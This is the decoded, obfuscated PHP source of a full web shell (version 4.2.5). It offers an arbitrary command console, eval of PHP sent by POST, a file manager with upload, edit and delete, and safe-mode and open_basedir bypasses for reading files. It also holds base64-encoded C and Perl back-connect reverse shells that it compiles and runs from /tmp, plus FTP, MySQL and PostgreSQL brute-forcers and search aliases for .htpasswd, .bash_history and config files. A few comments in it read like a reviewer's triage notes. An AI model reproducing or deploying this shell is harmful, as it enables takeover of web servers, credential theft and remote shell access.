/* Decoded by unphp.net */ [ Writeable ]" : " (Not writable)"; echo " \xa \x9\xa \x9\xa \x9 \x9\xa \x9 \x9 \xa\x9 \x9\x9\xa \xa
Change dir:
Read file:
Make dir:{$is_writable}
Make file:{$is_writable}
Execute:
\xa\x9 \x9 \xa\x9 \x9\xa \x9 Upload file:{$is_writable}

\x9\xa "; } goto DJcUw; nbMDY: function formatSizeUnits($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . " GB"; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . " MB"; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . " KB"; } elseif ($bytes > 1) { $bytes = $bytes . " bytes"; } elseif ($bytes == 1) { $bytes = $bytes . " byte"; } else { $bytes = "0 bytes"; } return $bytes; } goto XXrTo; O8Bkq: function actionSelfRemove() { if ($_POST["p1"] == "yes") { if ( @unlink( preg_replace( "!\(\d+\)\s.*!", "", __FILE__ ) ) ) { die( "Shell has been removed" ); } else { echo "unlink error!"; } } if ($_POST["p1"] != "yes") { hardHeader(); } echo "

Suicide

Really want to remove the shell?
Yes
"; hardFooter(); } goto u4WS6; KOaKG: function actionFilesMan() { if (!empty($_COOKIE["f"])) { $_COOKIE["f"] = @unserialize($_COOKIE["f"]); } if (!empty($_POST["p1"])) { switch ($_POST["p1"]) { case "uploadFile": if ( is_array( $_FILES["f"]["tmp_name"] ) ) { foreach ( $_FILES["f"]["tmp_name"] as $i => $tmpName ) { if ( !@move_uploaded_file( $tmpName, $_FILES["f"]["name"][$i] ) ) { echo "Can't upload file!"; } } } break; case "mkdir": if (!@mkdir($_POST["p2"])) { echo "Can't create new dir"; } break; case "delete": function deleteDir($path) { $path = substr($path, -1) == "/" ? $path : $path . "/"; $dh = opendir($path); while (($▟ = readdir($dh)) !== false) { $▟ = $path . $▟; if (basename($▟) == ".." || basename($▟) == ".") { continue; } $type = filetype($▟); if ($type == "dir") { deleteDir($▟); } else { @unlink($▟); } } closedir($dh); @rmdir($path); } if (is_array(@$_POST["f"])) { foreach ($_POST["f"] as $f) { if ($f == "..") { continue; } $f = urldecode($f); if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } } } break; case "paste": if ($_COOKIE["act"] == "copy") { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste( $c . $s . "/", $f, $d . $s . "/" ); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { copy_paste( $_COOKIE["c"], $f, $GLOBALS["cwd"] ); } } elseif ($_COOKIE["act"] == "move") { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste( $c . $s . "/", $f, $d . $s . "/" ); } } } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { @rename( $_COOKIE["c"] . $f, $GLOBALS["cwd"] . 
$f ); } } elseif ($_COOKIE["act"] == "zip") { if ( class_exists("ZipArchive") ) { $zip = new ZipArchive(); if ($zip->open($_POST["p2"], 1)) { chdir($_COOKIE["c"]); foreach ($_COOKIE["f"] as $f) { if ($f == "..") { continue; } if (@is_file($_COOKIE["c"] . $f)) { $zip->addFile($_COOKIE["c"] . $f, $f); } elseif (@is_dir($_COOKIE["c"] . $f)) { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $f . "/", FilesystemIterator::SKIP_DOTS ) ); foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS["cwd"]); $zip->close(); } } } elseif ($_COOKIE["act"] == "unzip") { if ( class_exists("ZipArchive") ) { $zip = new ZipArchive(); foreach ($_COOKIE["f"] as $f) { if ($zip->open($_COOKIE["c"] . $f)) { $zip->extractTo($GLOBALS["cwd"]); $zip->close(); } } } } elseif ($_COOKIE["act"] == "tar") { chdir($_COOKIE["c"]); $_COOKIE["f"] = array_map( "escapeshellarg", $_COOKIE["f"] ); ex( "tar cfzv " . escapeshellarg($_POST["p2"]) . " " . implode(" ", $_COOKIE["f"]) ); chdir($GLOBALS["cwd"]); } unset($_COOKIE["f"]); setcookie("f", "", time() - 3600); break; default: if (!empty($_POST["p1"])) { prototype("act", $_POST["p1"]); prototype("f", serialize(@$_POST["f"])); prototype("c", @$_POST["c"]); } break; } } hardHeader(); echo "

File manager

"; $dirContent = hardScandir( isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"] ); if ($dirContent === false) { echo "Can't open this folder!"; hardFooter(); return; } global $sort; $sort = ["name", 1]; if (!empty($_POST["p1"])) { if ( preg_match( "!s_([A-z]+)_(\d{1})!", $_POST["p1"], $match ) ) { $sort = [$match[1], (int) $match[2]]; } } echo " \xa"; $dirs = $files = []; $n = count($dirContent); for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = [ "name" => $dirContent[$i], "path" => $GLOBALS["cwd"] . $dirContent[$i], "modify" => date( "Y-m-d H:i:s", @filemtime($GLOBALS["cwd"] . $dirContent[$i]) ), "perms" => viewPermsColor( $GLOBALS["cwd"] . $dirContent[$i] ), "size" => @filesize( $GLOBALS["cwd"] . $dirContent[$i] ), "owner" => $ow["name"] ? $ow["name"] : @fileowner($dirContent[$i]), "group" => $gr["name"] ? $gr["name"] : @filegroup($dirContent[$i]), ]; if (@is_file($GLOBALS["cwd"] . $dirContent[$i])) { $files[] = array_merge($tmp, [ "type" => "file", ]); } elseif (@is_link($GLOBALS["cwd"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, [ "type" => "link", "link" => readlink($tmp["path"]), ]); } elseif ( @is_dir($GLOBALS["cwd"] . $dirContent[$i]) && $dirContent[$i] != "." ) { $dirs[] = array_merge($tmp, ["type" => "dir"]); } } $GLOBALS["sort"] = $sort; function cmp($a, $b) { if ($GLOBALS["sort"][0] != "size") { return strcmp( strtolower($a[$GLOBALS["sort"][0]]), strtolower($b[$GLOBALS["sort"][0]]) ) * ($GLOBALS["sort"][1] ? 1 : -1); } else { return ($a["size"] < $b["size"] ? -1 : 1) * ($GLOBALS["sort"][1] ? 1 : -1); } } usort($files, "cmp"); usort($dirs, "cmp"); $files = array_merge($dirs, $files); $l = 0; foreach ($files as $f) { echo ""; $l = $l ? 0 : 1; } echo "
NameSizeModifyOwner/GroupPermissionsActions
" . htmlspecialchars($f["name"]) : "g('FilesMan','" . $f["path"] . "');" " . (empty($f["link"]) ? "" : "title='{$f["link"]}'") . ">[ " . htmlspecialchars($f["name"]) . " ]") . "" . ($f["type"] == "file" ? viewSize($f["size"]) : $f["type"]) . "" . $f["modify"] . "" . $f["owner"] . "/" . $f["group"] . "" . $f["perms"] . "R T" . ($f["type"] == "file" ? " F E D" : "") . "
\xa\x9 \xa \xa\x9"; if ( !empty($_COOKIE["act"]) && @count($_COOKIE["f"]) && ($_COOKIE["act"] == "zip" || $_COOKIE["act"] == "tar") ) { echo " file name:  "; } echo "
"; hardFooter(); } goto Bpag2; rc2dt: function ex($in) { $▖ = ""; if (function_exists("exec")) { @exec($in, $▖); $▖ = @join("\xa", $▖); } elseif (function_exists("passthru")) { ob_start(); @passthru($in); $▖ = ob_get_clean(); } elseif (function_exists("system")) { ob_start(); @system($in); $▖ = ob_get_clean(); } elseif (function_exists("shell_exec")) { $▖ = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $▖ = ""; while (!@feof($f)) { $▖ .= fread($f, 1024); } pclose($f); } else { return "\342\x86\xb3 Unable to execute command\xa"; } return $▖ == "" ? "\342\206\263 Query did not return anything " : $▖; } goto YQzoR; r2c06: @ini_set("log_errors", 0); goto dPBlO; XGk3X: if ($os == "win") { $aliases = [ "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all", ]; } else { $aliases = [ "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name "config*"", "find config* files in current dir" => "find . -type f -name "config*"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . 
-perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv", ]; } goto Y2Zvy; TA8hx: $▜ = "UTF-8"; goto TQhs6; fqre7: if ($os == "win") { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } goto wJWJM; ewK8X: if (empty($_POST["charset"])) 
{ $_POST["charset"] = $▜; } goto hJVFy; ee0Wn: $▛ = md5($pw_unhashed); goto z59JV; gaWab: function actionNetwork() { hardHeader(); $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c = "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"; $bind_port_p = "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"; echo "

Network tools

\xa\x9
\xa Bind port to /bin/sh
\xa Port: Password: Using:
\xa\x9
\x9Back-connect to
Server: Port: Using: \xa\x9

"; if (isset($_POST["p1"])) { function cf($f, $t) { ($w = @fopen($f, "w")) or @function_exists( "file_put_contents" ); if ($w) { @fwrite($w, @base64_decode($t)) or @fputs($w, @base64_decode($t)) or @file_put_contents($f, @base64_decode($t)); @fclose($w); } } if ($_POST["p1"] == "bpc") { cf("/tmp/bp.c", $bind_port_c); $▖ = ex( "gcc -o /tmp/bp /tmp/bp.c" ); @unlink("/tmp/bp.c"); $▖ .= ex( "/tmp/bp " . $_POST["p2"] . " " . $_POST["p3"] . " &" ); echo "
{$▖}" . 
                ex( 
                    "ps aux | grep bp" 
                ) . 
                "
"; } if ($_POST["p1"] == "bpp") { cf("/tmp/bp.pl", $bind_port_p); $▖ = ex( which("perl") . " /tmp/bp.pl " . $_POST["p2"] . " &" ); echo "
{$▖}" . 
                ex( 
                    "ps aux | grep bp.pl" 
                ) . 
                "
"; } if ($_POST["p1"] == "bcc") { cf("/tmp/bc.c", $back_connect_c); $▖ = ex( "gcc -o /tmp/bc /tmp/bc.c" ); @unlink("/tmp/bc.c"); $▖ .= ex( "/tmp/bc " . $_POST["p2"] . " " . $_POST["p3"] . " &" ); echo "
{$▖}" . 
                ex( 
                    "ps aux | grep bc" 
                ) . 
                "
"; } if ($_POST["p1"] == "bcp") { cf("/tmp/bc.pl", $back_connect_p); $▖ = ex( which("perl") . " /tmp/bc.pl " . $_POST["p2"] . " " . $_POST["p3"] . " &" ); echo "
{$▖}" . 
                ex( 
                    "ps aux | grep bc.pl" 
                ) . 
                "
"; } } echo "
"; hardFooter(); } goto PYh2w; aQUM2: function actionSafeMode() { $temp = ""; ob_start(); switch ($_POST["p1"]) { case 1: $temp = @tempnam($test, "cx"); if ( @copy( "compress.zlib://" . $_POST["p2"], $temp ) ) { echo @file_get_contents($temp); unlink($temp); } else { echo "Sorry... Can't open file"; } break; case 2: $files = glob($_POST["p2"] . "*"); if (is_array($files)) { foreach ($files as $filename) { echo $filename . " "; } } break; case 3: $ch = curl_init( "file://" . $_POST["p2"] . "\x0" . SELF_PATH ); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include $_POST["p2"]; break; case 5: for ( ; $_POST["p2"] <= $_POST["p3"]; $_POST["p2"]++ ) { $uid = @posix_getpwuid($_POST["p2"]); if ($uid) { echo join(":", $uid) . " "; } } break; case 6: if (!function_exists("imap_open")) { break; } $stream = imap_open($_POST["p2"], "", ""); if ($stream == false) { break; } echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); hardHeader(); echo "

Safe mode bypass

"; echo "Copy (read file)

Glob (list dir)

Curl (read file)

Ini_restore (read file)

Posix_getpwuid ("Read" /etc/passwd)
From
To


Imap_open (read file)
"; if ($temp) { echo "
" . 
            $temp . 
            "
"; } echo "
"; hardFooter(); } goto W_qyb; YQzoR: function viewSize($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto XXfsY; WMTEU: function actionPhp() { if (isset($_POST["ajax"])) { $_COOKIE[ md5($_SERVER["HTTP_HOST"]) . "ajax" ] = true; ob_start(); eval($_POST["p1"]); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes( htmlspecialchars(ob_get_clean()), "\xa\xd \'\0" ) . "'; "; echo strlen($temp), " ", $temp; die(); } hardHeader(); if (isset($_POST["p2"]) && $_POST["p2"] == "info") { echo "

PHP info

"; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace( "!body {.*}!msiU", "", $tmp ); $tmp = preg_replace( "!a:\w+ {.*}!msiU", "", $tmp ); $tmp = preg_replace("!h1!msiU", "h2", $tmp); $tmp = preg_replace( "!td, th {(.*)}!msiU", ".e, .v, .h, .h th {$1}", $tmp ); $tmp = preg_replace( "!body, td, th, h2, h2 {.*}!msiU", "", $tmp ); echo $tmp; echo "

"; } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { $_COOKIE[ md5($_SERVER["HTTP_HOST"]) . "ajax" ] = false; } echo "

Execution PHP-code

"; echo " send using AJAX
"; 
    // Form (non-AJAX) path of the PHP-execution panel: a non-empty "p1" request
    // field is handed to eval() unchanged, so the request body decides which PHP
    // code the server runs. Output is captured with ob_start()/ob_get_clean()
    // and HTML-escaped before it is written into the page.
    // NOTE(review): top-level code elsewhere in this file replaces $_POST["p1"]
    // with iconv(decrypt(...)) using a cookie-held key unless the "ne" field is
    // set, so the value on the wire is presumably not plaintext PHP. For triage,
    // match on the eval($_POST[...]) construct in the file rather than on
    // request contents.
    if (!empty($_POST["p1"])) { 
        ob_start(); 
        eval($_POST["p1"]); 
        echo htmlspecialchars(ob_get_clean()); 
    } 
    echo "
"; hardFooter(); } goto KOaKG; hJVFy: if (!isset($_POST["ne"])) { if (isset($_POST["a"])) { $_POST["a"] = iconv( "utf-8", $_POST["charset"], decrypt( $_POST["a"], $_COOKIE[ md5($_SERVER["HTTP_HOST"]) . "key" ] ) ); } if (isset($_POST["c"])) { $_POST["c"] = iconv( "utf-8", $_POST["charset"], decrypt( $_POST["c"], $_COOKIE[ md5($_SERVER["HTTP_HOST"]) . "key" ] ) ); } if (isset($_POST["p1"])) { $_POST["p1"] = iconv( "utf-8", $_POST["charset"], decrypt( $_POST["p1"], $_COOKIE[ md5($_SERVER["HTTP_HOST"]) . "key" ] ) ); } if (isset($_POST["p2"])) { $_POST["p2"] = iconv( "utf-8", $_POST["charset"], decrypt( $_POST["p2"], $_COOKIE[ md5($_SERVER["HTTP_HOST"]) . "key" ] ) ); } if (isset($_POST["p3"])) { $_POST["p3"] = iconv( "utf-8", $_POST["charset"], decrypt( $_POST["p3"], $_COOKIE[ md5($_SERVER["HTTP_HOST"]) . "key" ] ) ); } } goto nbMDY; ZuuFx: $safe_mode = @ini_get("safe_mode"); goto AH6j_; p2UEO: @ini_set("error_log", null); goto r2c06; XXfsY: function perms($p) { if (($p & 49152) == 49152) { $i = "s"; } elseif (($p & 40960) == 40960) { $i = "l"; } elseif (($p & 32768) == 32768) { $i = "-"; } elseif (($p & 24576) == 24576) { $i = "b"; } elseif (($p & 16384) == 16384) { $i = "d"; } elseif (($p & 8192) == 8192) { $i = "c"; } elseif (($p & 4096) == 4096) { $i = "p"; } else { $i = "u"; } $i .= $p & 256 ? "r" : "-"; $i .= $p & 128 ? "w" : "-"; $i .= $p & 64 ? ($p & 2048 ? "s" : "x") : ($p & 2048 ? "S" : "-"); $i .= $p & 32 ? "r" : "-"; $i .= $p & 16 ? "w" : "-"; $i .= $p & 8 ? ($p & 1024 ? "s" : "x") : ($p & 1024 ? "S" : "-"); $i .= $p & 4 ? "r" : "-"; $i .= $p & 2 ? "w" : "-"; $i .= $p & 1 ? ($p & 512 ? "t" : "x") : ($p & 512 ? "T" : "-"); return $i; } goto Y5ImI; Y2Zvy: function actionConsole() { if (!empty($_POST["p1"]) && !empty($_POST["p2"])) { prototype( md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", true ); $_POST["p1"] .= " 2>&1"; } elseif (!empty($_POST["p1"])) { prototype( md5($_SERVER["HTTP_HOST"]) . 
"stderr_to_out", 0 ); } if (isset($_POST["ajax"])) { prototype( md5($_SERVER["HTTP_HOST"]) . "ajax", true ); ob_start(); echo "d.cf.cmd.value='';\xa"; $temp = @iconv( $_POST["charset"], "UTF-8", addcslashes( "\xa$ " . $_POST["p1"] . "\xa" . ex($_POST["p1"]), "\xa\xd\x9\'\x0" ) ); if ( preg_match( "!.*cd\s+([^;]+)$!", $_POST["p1"], $match ) ) { if (@chdir($match[1])) { $GLOBALS["cwd"] = @getcwd(); echo "c_='" . $GLOBALS["cwd"] . "';"; } } echo "d.cf.output.value+='" . $temp . "';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\xa", $temp; die(); } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { prototype( md5($_SERVER["HTTP_HOST"]) . "ajax", 0 ); } hardHeader(); echo ""; echo "

Console

send using AJAX redirect stderr to stdout (2>&1)
$
"; echo "
"; hardFooter(); } goto WMTEU; G8cmK: function actionBruteforce() { hardHeader(); if (isset($_POST["proto"])) { echo "

Results

Type: " . htmlspecialchars($_POST["proto"]) . " Server: " . htmlspecialchars($_POST["server"]) . "
"; if ($_POST["proto"] == "ftp") { function bruteForce($ip, $port, $login, $pass) { $fp = @ftp_connect($ip, $port ? $port : 21); if (!$fp) { return false; } $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif ($_POST["proto"] == "mysql") { function bruteForce($ip, $port, $login, $pass) { $res = @mysql_connect( $ip . ":" . ($port ? $port : 3306), $login, $pass ); @mysql_close($res); return $res; } } elseif ($_POST["proto"] == "pgsql") { function bruteForce($ip, $port, $login, $pass) { $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST["server"]); if ($_POST["type"] == 1) { $temp = @file("/etc/passwd"); if (is_array($temp)) { foreach ($temp as $line) { $line = explode(":", $line); ++$attempts; if ( bruteForce(@$server[0], @$server[1], $line[0], $line[0]) ) { $success++; echo "" . htmlspecialchars($line[0]) . ":" . htmlspecialchars($line[0]) . "
"; } if (@$_POST["reverse"]) { $tmp = ""; for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } ++$attempts; if ( bruteForce(@$server[0], @$server[1], $line[0], $tmp) ) { $success++; echo "" . htmlspecialchars($line[0]) . ":" . htmlspecialchars($tmp); } } } } } elseif ($_POST["type"] == 2) { $temp = @file($_POST["dict"]); if (is_array($temp)) { foreach ($temp as $line) { $line = trim($line); ++$attempts; if ( bruteForce( $server[0], @$server[1], $_POST["login"], $line ) ) { $success++; echo "" . htmlspecialchars($_POST["login"]) . ":" . htmlspecialchars($line) . "
"; } } } } echo "Attempts: {$attempts} Success: {$success}

"; } echo "

FTP bruteforce

" . "" . "" . "" . "" . "" . "" . "
Type
" . "" . "" . "" . "" . "Server:port
Brute type /etc/passwd
reverse (login -> nigol)
Dictionary
" . "" . "" . "
Login
Dictionary
" . "
"; echo "
"; hardFooter(); } goto hgt_8; n9j03: function hardScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } goto iBn85; mdCfK: @define("VERSION", "4.2.5"); goto PnC_E; MQqk2: function actionFilesTools() { if (isset($_POST["p1"])) { $_POST["p1"] = urldecode($_POST["p1"]); } if (@$_POST["p2"] == "download") { if (@is_file($_POST["p1"]) && @is_readable($_POST["p1"])) { ob_start("ob_gzhandler", 4096); header( "Content-Disposition: attachment; filename=" . basename($_POST["p1"]) ); if ( function_exists( "mime_content_type" ) ) { $type = @mime_content_type($_POST["p1"]); header( "Content-Type: " . $type ); } else { header( "Content-Type: application/octet-stream" ); } $fp = @fopen($_POST["p1"], "r"); if ($fp) { while (!@feof($fp)) { echo @fread($fp, 1024); } fclose($fp); } } die(); } if (@$_POST["p2"] == "mkfile") { if (!file_exists($_POST["p1"])) { $fp = @fopen($_POST["p1"], "w"); if ($fp) { $_POST["p2"] = "edit"; fclose($fp); } } } hardHeader(); echo "

File tools

"; if (!file_exists(@$_POST["p1"])) { echo "File not exists"; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST["p1"])); if (!$uid) { $uid["name"] = @fileowner($_POST["p1"]); $gid["name"] = @filegroup($_POST["p1"]); } else { $gid = @posix_getgrgid(@filegroup($_POST["p1"])); } echo "Name: " . htmlspecialchars(@basename($_POST["p1"])) . " Size: " . (is_file($_POST["p1"]) ? viewSize(filesize($_POST["p1"])) : "-") . " Permission: " . viewPermsColor($_POST["p1"]) . " Owner/Group: " . $uid["name"] . "/" . $gid["name"] . "
"; echo "Create time: " . date( "Y-m-d H:i:s", filectime($_POST["p1"]) ) . " Access time: " . date( "Y-m-d H:i:s", fileatime($_POST["p1"]) ) . " Modify time: " . date( "Y-m-d H:i:s", filemtime($_POST["p1"]) ) . "

"; if (empty($_POST["p2"])) { $_POST["p2"] = "view"; } if (is_file($_POST["p1"])) { $m = [ "View", "Highlight", "Download", "Hexdump", "Edit", "Chmod", "Rename", "Touch", "Frame", ]; } else { $m = [ "Chmod", "Rename", "Touch", ]; } foreach ($m as $v) { echo "" . (strtolower($v) == @$_POST["p2"] ? "[ " . $v . " ]" : $v) . " "; } echo "

"; switch ($_POST["p2"]) { case "view": echo "
"; 
            // "view" case of the file-tools panel: opens the path taken from the
            // "p1" request field read-only and streams it to the response in
            // 1024-byte chunks, HTML-escaping each chunk.
            // No base-directory or allow-list check on the path is visible in this
            // span, so the readable set looks limited only by the PHP process's own
            // filesystem permissions; verify against the start of the function.
            // Every filesystem call is prefixed with @, so a failed open or read
            // emits no warning and simply prints nothing.
            $fp = @fopen($_POST["p1"], "r"); 
            if ($fp) { 
                while (!@feof($fp)) { 
                    echo htmlspecialchars(@fread($fp, 1024)); 
                } 
                @fclose($fp); 
            } 
            echo "
"; break; case "highlight": if (@is_readable($_POST["p1"])) { echo "
"; $oRb = @highlight_file($_POST["p1"], true); echo str_replace( [""], [""], $oRb ) . "
"; } break; case "chmod": if (!empty($_POST["p3"])) { $perms = 0; for ($i = strlen($_POST["p3"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["p3"][$i] * pow(8, strlen($_POST["p3"]) - $i - 1); } if (!@chmod($_POST["p1"], $perms)) { echo "Can't set permissions!
"; } } clearstatcache(); echo "
"; break; case "edit": if (!is_writable($_POST["p1"])) { echo "File isn't writeable"; break; } if (!empty($_POST["p3"])) { $time = @filemtime($_POST["p1"]); $_POST["p3"] = substr($_POST["p3"], 1); $fp = @fopen($_POST["p1"], "w"); if ($fp) { @fwrite($fp, $_POST["p3"]); @fclose($fp); echo "Saved!
"; @touch($_POST["p1"], $time, $time); } } echo "
"; break; case "hexdump": $c = @file_get_contents($_POST["p1"]); $n = 0; $h = ["00000000
", "", ""]; $len = strlen($c); for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("%02X", ord($c[$i])) . " "; switch (ord($c[$i])) { case 0: $h[2] .= " "; break; case 9: $h[2] .= " "; break; case 10: $h[2] .= " "; break; case 13: $h[2] .= " "; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i + 1 < $len) { $h[0] .= sprintf("%08X", $i + 1) . "
"; } $h[1] .= "
"; $h[2] .= "\xa"; } } echo "
" . 
                $h[0] . 
                "
" . 
                $h[1] . 
                "
" . 
                htmlspecialchars($h[2]) . 
                "
"; break; case "rename": if (!empty($_POST["p3"])) { if (!@rename($_POST["p1"], $_POST["p3"])) { echo "Can't rename!
"; } else { die( "" ); } } echo "
"; break; case "touch": if (!empty($_POST["p3"])) { $time = strtotime($_POST["p3"]); if ($time) { if (!touch($_POST["p1"], $time, $time)) { echo "Fail!"; } else { echo "Touched!"; } } else { echo "Bad time format!"; } } clearstatcache(); echo "
"; break; case "frame": $frameSrc = substr( htmlspecialchars($GLOBALS["cwd"]), strlen( htmlspecialchars( $_SERVER[ "DOCUMENT_ROOT" ] ) ) ); if ($frameSrc[0] != "/") { $frameSrc = "/" . $frameSrc; } if ($frameSrc[strlen($frameSrc) - 1] != "/") { $frameSrc = $frameSrc . "/"; } $frameSrc = $frameSrc . htmlspecialchars($_POST["p1"]); echo ""; break; } echo "
